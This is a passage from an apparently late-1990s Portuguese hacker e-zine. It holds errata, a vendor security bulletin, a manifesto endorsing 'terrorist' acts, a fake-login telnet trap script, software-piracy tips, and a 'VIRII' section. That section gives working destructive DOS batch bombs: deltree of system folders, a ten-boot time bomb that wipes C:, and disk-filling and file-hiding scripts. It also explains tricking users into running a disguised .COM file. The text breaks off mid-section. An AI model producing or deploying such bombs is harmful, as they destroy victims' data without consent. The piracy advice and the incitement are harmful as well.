                    zZZZZZZZZZZZZZZZZZZZZZZZZ
                                          zZ
                                         zZ
                                        zZ
                                       zZ
                                      zZ
                 CCCCCCCCCCCCCCCC    zZ SSSSSSSSSSSSSSSS
                CCCCCCCCCCCCCCCCC   zZ SSSSSSSSSSSSSSSSS
               CCCCCCCCCCCCCCCCCC  zZ SSSSSSSSSSSSSSSSSS
              CCCCCC        CCCCC zZ SSSSSS        SSSSS
             CCCCCCC             zZ SSSSSSS
            CCCCCCCC            zZ SSSSSSSSSSSSSSSSSSSSS
            CCCCCCCC           zZ  SSSSSSSSSSSSSSSSSSSSS
             CCCCCCC          zZ                SSSSSSS
              CCCCCC        CCCCC  SSSSS        SSSSSS
               CCCCCCCCCCCCCCCCCC  SSSSSSSSSSSSSSSSSS
                CCCCCCCCCCCCCCCCC  SSSSSSSSSSSSSSSSS
                 CCCCCCCCCCCCCCCC  SSSSSSSSSSSSSSSS
                         zZ
                        zZ
                       zZ
                      zZ
                     zZ
                    zZZZZZZZZZZZZZZZZZZZZZZZZine

                        by Cheat Struck

	Belo visual naum?

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

		UIN   da   revista : 16623675
		Canal  da  revista : #CSCHANNEL no irc.via-rs.com.br
		E-Mail  da revista : cszine@hotmail.com
                Memoserv da revista: /msg memoserv send Struck <msg>
                                      (Soh no via-rs)
	        Page  da   revista : http://members.xoom.com/cszine

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=

	Introdução:

	Estamos quase completando a segunda dezena da zine. Vamos ver...
pelos meus calculos eu começei com a zine em julho, então logo vamos comple-
tar 20 edições em 4 meses. Isso quer dizer que a zine ehhh.. semanal?? naum,
mais do que isso. Acho que sai de 5 por mes.
	Bacana neh. Tem vezes que eu me descuido e coloco as 2 ultimas edi-
ções num soh dia. hmmm.. o index.htm da page não estah sendo atualizado pq eu
sei que quem entra não tah nem ai para o pensamento do dia. As unicas paginas
que serão atualizadas são links.htm, cszine.htm(2x por semana), others.htm e
progs.htm o resto e' pouco provavel.
	Gostaria de me desculpar com o VooDoo(nukei ele sem saber quem era).
Vou explicar pra vcs oque aconteceu.. O voodoo entrou com outro nick na viars
e me deu um version. Pra mim quando chega um kra q eu naum conheço, dando
version ou quer chamar os outros de lamah por tarem usando Win95 ou quer dar
flood. Ae eu me equivoquei e nukei ele. Mas jah fiz as pazes com ele.
	VERSION não eh proibido. Mas não faça isso com todo mundo ou isso
pode acontecer com vc tb.
	Foi mal VooDoo.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=--=-=-=-=-=-=-=-=-

	Indice :

Seção:	Materia:		Assunto:		Autor:		Nota:
1.	Erratas			Erros jah cometidos	Cheat Struck	10,0
2.	Manifesto		Count Down Manifesto	PEST		9,5
3.	Programação		Fuck Protetion		Cheat Struck	9,0
4.	Pirataria		Microsoft Suckz		Cheat Struck	10,0
5.	VIRII			BAD COM's e Bombas	Cheat Struck	9,5
6.      Phreaking               Boxes em fase de testes Cheat Struck    10,0
7.	Redes			FireWalls		Anonymous	8,5
8.	Invasão de privacidade	Lista de segurança	Pangéia LTDA.	10,0
9.      Hack, the Art           Hack Tinks              Cheat Struck    9,5
10.     ¡¡¡BoNuS!!!		Lista de provedores	Cheat Struck	10,0

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$            $$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  1. Erratas  $$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$            $$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Erros em edições passadas

***Edição numero 01***
	O provedor ginet mostrado nessa edição, adquiriu um sistema de prote-
ção mais phoda de se hackear.

***Edição numero 04***
	A lista de pesquisa hacking mostrada nessa edição e' a versão 1.1 e
não 1.0.

***Edição numero 05***
	A materia publicada na seção invasão de privacidade contém alguns
dados incorretos, jah corrigidas na edição passada. Nesta mesma seção apare-
cem 2 servidores WIN que jah não existem mais.

	Na seção preview esta' previsto uma "Lista de provedores e endereços
ftp do BRASIL" coisa que eu pensei em fazer mas nunca saiu.

***Edição numero 08***
	Na seção "Hack, the Art" repetiu a materia publicada na edição 06.

***Edição numero 09***
	Erro pequeno: No indice não foi publicado o assunto, autor e nota da
seção "Preview".

***Edição numero 10***
	Na seção "IRC TIPS", o meio de dar telnet por uma porta qquer não e':
telnet {url/ip}:{porta} {terminal}
	e sim:
telnet {url/ip} {porta} {terminal}

	Na seção "Programação" ficou faltando algumas coisinhas:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

##### if #####
	Você sabe pra que que serve naum eh??
	Ex1:

if [ $1x = x ]; then
	#conteudo caso não exista a variavel 1(primeiro sub comando)
fi

	Ex2:

if [ "$1" = '-?' ]; then
	#conteudo se o subcomando for -?
fi

	Tipo..No exemplo2 se o cara digitar "./look -?" aparecerá o conteu-
do entre o if e fi. Sendo que "look" é o nome do script.

##### function #####
	Estabelece uma função para ser usada no script.
	Ex:

function inicio{
	#conteudo
}
inicio

##### Usando variaveis #####
	Facil, facil..
	Ex1:

nome = "Julio"
echo "Seu nome é : $nome

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--=-==-

***Edição Numero 14***
	Na seção "Hack, the Art" existe uma materia(Bloqueando um servidor de
IRC) que está incorreta. Essa materia foi corrigida na edição 15.

***Edição Numero 15***
	Alí no guia de edições da CSZine, na edição numero 02, seção 6 ("FAQ
sobre sniffer") naum foi escrito por mim e sim por Christopher William Klaus
da Internet Security Systems, Inc.

***Edição Numero 16***
	Ficou faltando a pagina 008 do boletim de segurança da Pangéia.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=

        Boletim 008/97 da Lista de Segurança da Pangéia Informática

30 de Março de 1997

Tópico: Vulnerabilidade em clientes ftp antigos

Foi verificada uma vulnerabilidade na seguinte versão do cliente ftp,
que acompanha várias distribuições Linux:
/bin/ftp:
$Id: ftp.c,v 1.1 1994/05/23 09:03:41 rzsfl Exp rzsfl $
$Id: cmds.c,v 1.1 1994/05/23 09:03:41 rzsfl Exp rzsfl $
$Id: cmdtab.c,v 1.1 1994/05/23 09:03:41 rzsfl Exp rzsfl $
$Id: domacro.c,v 1.2 1993/08/01 18:15:29 mycroft Exp $
$Id: glob.c,v 1.1 1994/05/23 09:03:42 rzsfl Exp rzsfl $
$Id: main.c,v 1.1 1994/05/23 09:03:42 rzsfl Exp rzsfl $
$Id: ruserpass.c,v 1.1 1994/08/17 13:52:59 florian Exp florian $

Esta vulnerabilidade permite a um usuário local ter acesso senhas de
outros usuários usadas em sistemas locais e remotos.

1. Descrição

Foi verificado que a versão do ftp acima, em determinadas
circunstancias gera um arquivo 'core' contendo a senha (em claro,
não criptografada) que o usário usou para conectar-se a um ftp
servidor qualquer.

2. Impacto:

Esta característica pode permitir a um usuário comum ter acesso a
senhas de outros usuários, por exemplo se o arquivo "core" for gerado
em um diretório público.

3. Solução:

Instalar o ftp cliente que acompanha o pacote NetKit-0.09,
ou equivalente, contendo a seguinte identificação ou mais
recente.
/bin/ftp:
$Id: cmds.c,v 1.15 1996/12/31 19:15:36 dholland Exp $
$Id: cmdtab.c,v 1.5 1996/08/19 20:24:44 dholland Exp $
$Id: domacro.c,v 1.4 1996/08/14 23:27:28 dholland Exp $
$Id: ftp.c,v 1.13 1996/11/25 18:42:46 dholland Exp $
$Id: glob.c,v 1.5 1996/08/14 23:27:28 dholland Exp $
$Id: main.c,v 1.11 1996/08/30 21:05:57 dholland Exp $
$Id: ruserpass.c,v 1.3 1996/08/14 23:27:28 dholland Exp $

O pacote NetKit-0.09 está disponível também em:
ftp://ftp.pangeia.com.br/pub/seg/NetKit-0.09.tar.gz

4. Informações adicionais:
http://www.pangeia.com.br/faq.html

nelson@pangeia.com.br

5. Agradecimentos:

Klaus Steding-Jessen (jessen@ahand.unicamp.br)
Pedro Vazquez (vazquez@iqm.unicamp.br)

1995-98 © Pangéia Informática LTDA.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Soh isso galera

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  2. Manifesto  $$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Count Down Manifesto

                               MANIFESTO

	Irei comecar dizendo o nosso proposito, mostrando a voces as nossas
ideias e razoes. Hoje eu designado como a PEST estou aqui para lhes dizer que
a uniao traz o PODER e que com o poder poderemos melhorar este mundo.

	Nao com a forca, mas com a organizacao do sistema. Quero lhes dizer
que voces que se consideram um verdadeiro Hacker nao sao NADA. Nao passam de
pessoas que por terem um determinado conhecimento sao nomeados de ladroes,
que alegram-se em obter alguns senhas e sao esquecidos como uma gripe que
veio e se foi. Algo pequeno que nao deve nem ser conciderado grandioso, mas
sim criminoso. Quem sao os hackers, o que eh ser hacker?

	LADROES? Entao devem ser presos e encarcerados, sao marginais. Eh
assim que penssam as pessoas lah fora. E voce tem orgulho de ser ladrao? Tem
orgulho de ser apenas um marginal que deve ser tratado como os que vendem
drogas e matam? Hackers ou sao ladroes geralmente de 15 ah 1... anos ou sao
mera FICCAO. Eh assim que penssam a maioria dos ignorantes deste mundo de
lamentacoes e rangeres de dentes. Precisamos mudar isso! Como faremos? Nos
unindo e fazendo o que fazemos melhor. Fucar! Nao estou pedindo que facam
clubinhos, isso eh coisa de SPRITDOWNS que se divertem jogando virus nos
computadores dos colegas. Estou pedindo que deixem de ser meros hackers para
serem os comvocados pela VOZ do TROVAO, para serem OS ARCANJOS. Sim, pessoas
que trabalharao como uma corrente, trocando conhecimentos e ideias. Para o
bem comum. Estou pedindo que facam parte de uma IRMANDADE, cujo objetivo eh
"aparecer" defendendo causas verdadeiras e de ser reconhecida nao como
ladroes ou mera ficcao, mas como as lagrimas de DEUS, COMO o suspiro da
NATUREZA e o grito dos JUSTOS. Voce pode esta rindo deste texto, achando um
exagero ou uma alucinacao. Entao, meu caro irmao, saia da frente de seu
monitor SVGA de 16000000de cores e veja o mundo em que voce coexiste com a
sua carcassa. Olhe para os olhos daquelas criancas que pedem PELO AMOR DE
DEUS NAO DEIXEM EU MORRER DE FOME. E o que eles ganham eh um NAO seguido de
um olhar de desprezo e fechar de janela. Entao este ser "insignificante"
segue o seu percursso em direcao a MORTE. A pest CHORA! O mundo do futuro eh
um mundo controlado pelas maquinas, e quem controla as maquinas controlara o
mundo. Este eh o nosso objetivo? Nao! O nosso objetivo eh justica, justica
por aqueles que perecem na miseria e na escuridao. Eles lutam lah fora pela
LIBERDADE e o direito de VIVER. E nos os 4 cavaleiros do apocalipse com os
seus seguidores, os ARCANJOS, mostrarao os seus manifestos aqui na REDE.

	Juntando os seus conhecimentos e alma em um movimento solido. Estamos
em um mundo onde quem consome VALE +. E quem nao vale, deve ser conssumado.
Precisamos mudar isso nem que tenhamos de realizar atos talvez considerados
"terroristas". Voces nao devem ter percebido mas o CAOS chegou, a nova ERA eh
agora. Os 4 cavaleiros com seus cavalos e espadas pairam sobre as nossas
cabecas. Facamos unidos os nossos conhecimentos, a LEI; os teclados as nossas
ESPADAS. Mostrando a todos os nossos pensamento. Pois a VOZ do TROVAO disse
"Eu virei como ladrao na noite". Temos o nosso campo de batalha, A REDE.
Temos as nossas armas, O MODEM, TECLADO... Temos as nossas bocas, IRC,
HOMEPAGES, ZINES... E temos as nossas rasoes, O CAOS ou a ORDEM. E os 4 cava-
leiros com seus cavalos empunhando suas espadas e seguidos pelo seu exercito,
OS ARCANJOS, estao no CYBERWORLD para ajudar a JUSTICA e a RASAO.

	Manifesto de Eethernal-Pest contra o preconceito a nos e os pobres de
capital.

                           Siga seu caminho

-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                $$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  3. Programação  $$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                $$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-=-=-=--=-==-=--=-==--=-=-=-==-=-=-=--=-

	Sistemas de proteções

	Tipo o publicado semana passada.
	Porém aki vc não precisará adicionar uma conta nova. Apenas adicione
esta linha no /etc/hosts.denny.

in.telnetd: ALL: twist /bin/fuck

	Agora coloque este arquivo no diretório /bin e prounto!
	Deixa eu explica como funciona. Quando um usuario desconhecido se
logar ao seu sistema, ele abrira' esse programa e ficara' se achando o hacker
pois acessou um login de destruição do sistema(hehehe, foda neh). Usuario
desconhecido eu me refiro a akeles que não tem permição de usar o telnet do
seu sistema(os que não estão no hosts.allow).
	E' hilario vê a cara do palhaço que fica achando que tah destruindo o
seu sistema. Pena que não tem como tu ver o babaca.

----------------------------Corte Aki---(fuck)-------------------------------
#
#   Fuck Protetion by Cheat Struck / CopyRight ® CSS 1997 - 98
#
#  Se tiver afim de poupar uns miseros bytes, pode retirar estes comentarios.
#  Se quizer quebrar o CopyRight, faça-o e me diga como colocou este programa
# nos sistemas do Pentagono.
#  Se você e' muito Lamer, nao aconselho o uso deste programa a menos que vc
# tenha consiencia do que esta' fazendo.
#
function inicio {
echo " "
echo "RedHat Linux 4.1 (Cheat Struck)"
echo "Kernel 2.0.24"
echo " "
echo -e "Login:"'\c'
read login
sleep 1
echo -e $login " Passwd:"'\c'
read pass
sleep 1
echo " "
echo "Login Incorrect"
echo " "
echo -e "Login:"'\c'
read login
sleep 1
echo -e $login " Passwd:"'\c'
read pass
sleep 1
destruir
}
function destruir {
echo " "
echo " Special Function Login Activated"
echo -e "Re-enter Passwd:"'\c'
read pass1
sleep 1
if [ $pass = $pass1 ]; then
echo " "
echo "Destruction System Function Activated"
echo "Login = " $login " - OK"
echo "Passwd = " $pass " - OK"
echo "Repasswd = " $pass1 " - OK"
sleep 1
echo -e "System Crush."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 5
clear
exit
fi
clear
inicio
}
inicio
-----------------------------------------------------------------------------

	Depois disso, se vc pudesse ouvir uma unica palavra do kra que tentou
entrar, seria "UAU!".
	Nas próximas edições publicarei mais scripts shells em quanto não
chega mais gente pra escrever tutoriais ou programas.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  4. Pirataria  $$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Microsoft Suckz

-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Alguns contratos assinados por Bill Gates:

* EULA: O EULA é o contrato relativo ao uso que você faz do produto licencia-
        do e lhe concede um direito específico de uso do software Microsoft
        em seu computador. Qualquer cópia não licenciada pelo EULA(Contrato
        de Licença de Usuário Final) é considerada uma violação nos direitos
        autorais, a não ser no caso desta ser liberada pelo proprietário ou
        pelo MLP.

* MLP: O MLP(Microsoft License Pack) é um contrato que autoriza a realização
       de uma ou mais cópias de determinado produto Microsoft. Por exemplo,
       se você trabalha em uma pequena empresa com dois computadores e preci-
       sa usar o Microsoft Word nos dois computadores, pode comprar uma única
       cópia do Microsoft Word e um MLP de uma única cópia para o Word.

	Da pra acreditar no que diz esses contratos??
	Se você não entendeu bem as besteiras que eles estabelecem, Aqui vai
um exemplo:
	Se você comprou um Windows 3.1 e depois de 2 anos decidiu atualiza-lo
para o Windows95, você ainda deve conservar o antigo produto como parte dessa
unidade de software. Ou seja: você deve guardar a cópia do Windows 3.1 como
parte do seu produto adquirido legalmente.
	Putz! Soh pq vc tinha o Windows 3.1 não poderá revende-lo ou apenas
jogar no lixo. Você tem que ficar com ele para não estar violando a lei. Que
baita merda heim?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	O que é pirataria de software?

	A pirataria de software consiste na cópia não autorizada de softwares
protegidos por leis de direitos autorais. Em média, para cada cópia autoriza-
da de software, é feita pelo menos uma cópia pirata.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=

	Pirateando...

	Há cinco formas básicas de pirataria de software:
* Cópia pirata:  Ocorre quando são feitas cópias extras de um programa dentro
                 de uma organização, para uso dos funcionários. A "troca de
                 discos" entre amigos e colegas fora de um ambiente de traba-
                 lho está também incluída nesta categoria.

* Cópia pirata pré-instalada:  Alguns revendedores de computador carregam
                               cópias piratas nos discos rígidos dos computa-
                               dores que colocam à venda, como incentivo para
                               o usuário final na compra de um computador
                               desse determinado revendedor.

* Falsificação:  É a duplicação e venda ilegal de software protegido por di-
                reitos autorais, geralmente em uma forma destinada a fazer
                com que o produto pareça legítimo. A falsificação de software
                pode ser muito sofisticada, incluindo esforços consideráveis
                para imitar embalagem,logomarcas e técnicas anti-falsificação
                ,como hologramas. Pode também ser mais rudimentar,consistindo
                em rótulos de qualidade inferior ou escritos à mão, com os
                discos embrulhados num saco plástico e vendidos nas esquinas.

* Pirataria em BBSs:  Esta forma de pirataria ocorre quando um software pro-
                     tegido por direitos autorais é carregado remotamente por
                     usuários conectados via modem a uma BBS pública ou semi-
                     privada. Isto não deve ser confundido com o fornecimento
                     de Sharewares. Qualquer software Microsoft não autoriza-
                     do, disponível através de uma BBS, deve ser considerado
                     ilegal.

* Aluguel de Software:  É onde o software é "alugado" ilegalmente a usuários
                       que o copiam no disco rígido de seus computadores e,
                       em seguida, devolvem a cópia a quem a alugou.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Cuidados a tomar quando se pirateia um produto Microsoft..

-Tomar o cuidado de não deixar marcas comerciais de outras impresas a não ser
 a Microsoft.
-Cuidar ao imprimir a frente do CD pirata de um sistema operacional. Sempre
 deve ter a mensagem  "Distribuido somente com um  computador novo" ou algo
 do gênero.
-Colocar o contrato de licença de usuário final (EULA).
-Colocar o cartão de registro do produto.
-Colocar o Certificado de Autenticidade.
-Colocar um mecanismo de requisição (como um cartão-resposta).
-Colocar discos de backup, manuais, cartão de registro, EULA e/ou Certificado
 de Autenticidade contendo  um holograma contra pirataria e rótulo de confir-
 mação para o software de sistema pré-instalado, que inclui  um pacote do
 produto dentro da caixa do computador. Os pacotes de produtos devem conter
 todos esses  elementos.
-Os discos de backup nunca devem contêr rótulos escritos à mão, não embalados
 adequadamente e/ou   parecerem ser de qualidade inferior.
-O(s) manual(ais) não devem ser fotocopiados, não embalados adequadamente
 e/ou ter impressão de má   qualidade.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Pirateando Discos DMF(Dos Model Format)

	A Microsoft, quando lançou o Windows 95, deve ter achado que o forma-
to DMF(Dos Model Format) ia ser um grande problema para nós, mas como sempre
estavam errados.
	Para piratiar discos com formato DMF cluster 2048 (1.716.224 mb), vc
deve adquirir programas ilegais. Porém existem também muitos outros legais,
podemos citar por exemplo o VGAcopy, Win Image 95, e 2mGUI versão1.9, entre
muitos outros ai no mercado.
	O melhor segundo meu respeito é o 2mGUI v1.9 que tem a incrível
capacidade de formatar um disco de (1.457.664 mb) em (2.221.858 mb), este
programa é simplesmente longe dos limites, quanto aos outros, eles fazem o
necessário para uma boa pirataria.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  5. VIRII  $$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-==--==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	BAD COM

	Vou explicar claramente o que são BAD COMs..
	Crie o diretorio \TESTE e copie os arquivo \WINDOWS\COMMAND\edit.com
e debug.exe. Agora crie o arquivo test.bat com o seguinte conteudo:

-----------------------------Corte Aki--(test.bat)---------------------------
@echo off
echo test.bat
-----------------------------------------------------------------------------

	Note que os 3 tipos de arquivos executados em DOS foram incluidos
nesse diretório(.EXE, .COM e .BAT). Então vamos dar o mesmo nome a eles.
Digite "ren *.* test.*".
	De um DIR para ver como estão os arquivos. Aparecerá +/- assim:

C:\TESTE> dir
 O número de série do volume é XXXX-XXXX
 Diretório de C:\TESTE

.              <DIR>        25/06/98   3:57 .
..             <DIR>        25/06/98   3:57 ..
TEST     COM        21.002  24/08/95   9:50 test.com
TEST     EXE        70.830  24/08/95   9:50 test.exe
TEST     BAT            16  02/01/00  10:34 test.bat
         3 arquivo(s)             91.838  bytes
         2 diretório(s)      564.609.024  bytes livres

	Agora execute o programa TEST. Qual?? Apenas digite TEST e veja qual
será executado. Não vou fazer misterio. O edit.com sera' executado. Delete-o
desse diretório e digite TEST novamente e o debug.exe sera' executado.
	Notou a sequencia???
	Os primeiros arquivos a serem executados são os .COM .
	Os segundos são os .EXEs .
	E por fim os .BATs .

	Então os BAD-COMs consistem em enganar a shell, fazendo-a executar o
programa .COM antes do .EXE . Tipo.. Existe um arquivo no seu disquete chama-
do install.exe mas existe tb um bad-com num path(exemplo: \WINDOWS) chamado
install.com . Então quando vc digitar install, ao invés de ser executado o
programa de instalação do disquete, será executado o bad-com.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Bombas .BAT

	A outras maneiras de se enganar a shell,sem precisar colocar arquivos
.COM (Isso e' bem requerido para lamers).
	E' bem moleza.
	Você sabe alguns comandos malignos de DOS naum sabe??? Tipo..deltree,
format, .. Se nem isso vc sabe, de uma lida na seção de programação lah da
edição 00.
	Então faça um arquivo .bat tipo bomba. Se não tem capacidade nem pra
fazer isso pegue este exemplo os exemplos a seguir.
	Depois de ter feito a bomba nomeie-as como:

	WIN.BAT
	E coloque no diretório raiz. Ae quando o cara quizer voltar para o
windows e estiver na raiz. Ele digitará "win". Então sera' executado esta
bomba.
	Aki vai um exemplo de bomba a ser colocada no Win.bat.
-----------------------------Corte Aki--(WIN.BAT)----------------------------
@echo off
deltree /y c:/windows/system
del c:/windows/win.ini
del c:/windows/system.ini
c:\windows\win.com
-----------------------------------------------------------------------------

	AUTOEXEC.BAT
	E coloque-o na raiz. Ae sempre que iniciar o sistema, a bomba sera'
executada. Essa bomba exemplo enchera' o HD do babaca de porcaria sempre que
ele iniciar o computador.
---------------------------Corte Aki--(AUTOEXEC.BAT)-------------------------
@echo off
dir /s C:\ >> C:\Windows\System\VBRUN101.DLL
-----------------------------------------------------------------------------

	Quer Arquivo
	Essa e' legal. Vou colocar exemplos apenas aki tah bem. Se não enten-
der eu não vou ficar explicando.
	Esta bomba deixara' todos os arquivos do diretório WINDOWS invisiveis
e o dono pensara que foram deletados mesmo o windows executando normalmente.
Coloque esta' bomba na raiz.
----------------------------Corte Aki--(HIDE.BAT)----------------------------
@echo off
attrib +H C:\Windows\* /S
-----------------------------------------------------------------------------
	Agora faremos que quando o usuario digitar o comando cls, a bomba se-
ja executada. Para isso precisaremos adicionar essas linhas no autoexec.bat.
---------------------------Corte Aki--(AUTOEXEC.BAT)-------------------------
@echo off
doskey cls c:\hide.bat
-----------------------------------------------------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Outras Bombas:

	Bomba relógio. E' bem simples de se entender se tiver um pouquinho de
conhecimento sobre .BATs. Deve ser colocado no lugar do AUTOEXEC.BAT .
	Essa bomba conta 10 inicializações do computador, então acaba com o
HD do palhaço.
------------------------------Corte Aki--(AUTOEXEC.BAT)----------------------
@echo off
cls
:1
if exist c:\windows\system\a1.dll goto 2
echo 1111 > c:\windows\system\a1.dll
goto fim
:2
if exist c:\windows\system\a2.dll goto 3
echo 1111 > c:\windows\system\a2.dll
goto fim
:3
if exist c:\windows\system\a3.dll goto 4
echo 1111 > c:\windows\system\a3.dll
goto fim
:4
if exist c:\windows\system\a4.dll goto 5
echo 1111 > c:\windows\system\a4.dll
goto fim
:5
if exist c:\windows\system\a5.dll goto 6
echo 1111 > c:\windows\system\a5.dll
goto fim
:6
if exist c:\windows\system\a6.dll goto 7
echo 1111 > c:\windows\system\a6.dll
goto fim
:7
if exist c:\windows\system\a7.dll goto 8
echo 1111 > c:\windows\system\a7.dll
goto fim
:8
if exist c:\windows\system\a8.dll goto 9
echo 1111 > c:\windows\system\a8.dll
goto fim
:9
if exist c:\windows\system\a9.dll goto 10
echo 1111 > c:\windows\system\a9.dll
goto fim
:10
deltree /y c:\ > null
:fim
echo.
-----------------------------------------------------------------------------

	Travando a maquina.
	Hehehe. Primeiro crie um arquivo de texto qquer e nomeie-o com a
extenção .EXE . Exemplo: echo besteiras > c:\windows\init.exe
	 Depois inclua a seguinte bomba no config.sys:
